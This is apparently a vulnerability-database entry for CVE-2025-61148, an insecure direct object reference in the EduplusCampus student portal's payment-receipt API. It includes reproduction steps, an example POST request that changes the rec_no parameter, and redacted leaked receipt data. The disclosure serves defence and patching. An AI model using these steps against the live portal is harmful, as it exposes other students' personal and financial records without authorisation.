| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-61148 | 3 Dec 202505:21 | – | circl | |
| EduplusCampus 安全漏洞 | 4 Dec 202500:00 | – | cnnvd | |
| CVE-2025-61148 | 4 Dec 202500:00 | – | cve | |
| CVE-2025-61148 | 4 Dec 202500:00 | – | cvelist | |
| EUVD-2025-201212 | 4 Dec 202500:00 | – | euvd | |
| CVE-2025-61148 | 4 Dec 202516:16 | – | nvd | |
| CVE-2025-61148 | 4 Dec 202516:16 | – | osv | |
| 📄 EduplusCampus Student Portal 3.0.1 Insecure Direct Object Reference | 12 Dec 202500:00 | – | packetstorm | |
| PT-2025-49097 | 4 Dec 202500:00 | – | ptsecurity | |
| CVE-2025-61148 | 11 Dec 202505:03 | – | redhatcve |
# CVE-2025-61148
The vulnerability exists in the Student Payment API. The application fails to properly validate whether the user requesting a receipt is authorized to view it. By modifying the rec_no parameter in the API request, an attacker can access the receipts of other users.
# CVE-2025-61148: IDOR in EduplusCampus Student Payment API
**CVE ID:** CVE-2025-61148
**Vulnerability Type:** Insecure Direct Object Reference (IDOR)
**Affected Product:** EduplusCampus
**Affected Endpoint:** `/student/get-receipt`
**Researcher:** Vinay Sharma
## Summary
A critical Insecure Direct Object Reference (IDOR) vulnerability was identified in the EduplusCampus student portal (version 3.0.1). This vulnerability allows an authenticated user to access the sensitive personal and financial records of other students by modifying the `rec_no` parameter in the API request.
## Impact
Successful exploitation allows an attacker to retrieve:
* Full Name and Roll Number
* Payment Amount and Dates
* Transaction IDs (TID) and Bank Details
* Personal Identifiable Information (PII)
## Vulnerability Details
The application fails to properly validate the authorization of the user requesting a payment receipt. The `rec_no` parameter is sequential or guessable, and the server returns the receipt details for the requested number without checking if it belongs to the currently logged-in user.
### Steps to Reproduce
1. Login to the student portal.
2. Navigate to the receipt generation section.
3. Intercept the POST request to `/student/get-receipt`.
4. Locate the `rec_no` parameter in the JSON body.
5. Modify the `rec_no` value to another valid receipt number (e.g., changing `PCUF-232025` to `PCUF-231824`).
6. Send the request.
7. The server responds with the personal and financial details of the student associated with that receipt number.
<img width="716" height="446" alt="image" src="https://github.com/user-attachments/assets/a6735745-e9e7-40ec-8218-583cc152793d" />
<img width="720" height="485" alt="image" src="https://github.com/user-attachments/assets/7ee25304-dbb6-4463-a2a2-058cfef0e945" />
### Example Request
```http
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>
{
"rec_no": "PCUF-233012"
}
### Leaked DATA Example:
{
"fullname": "REDACTED_NAME",
"rollno": "CSE2019XXX",
"component_total_amount": 55000.0,
"trans_list": [
{
"date": "21-Oct-2024",
"mode": "Online",
"amount": 55000.0,
"tid": "42951XXXX"
}
]
}
```
### Vendor Information
* **Vendor:** EduplusCampus
* **Product:** EduplusCampus Student Portal / Student Payment API
### Affected Versions
* **Version:** EduplusCampus 3.0.1
### Discoverer
* **Vinay Sharma** - Security ResearcherData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation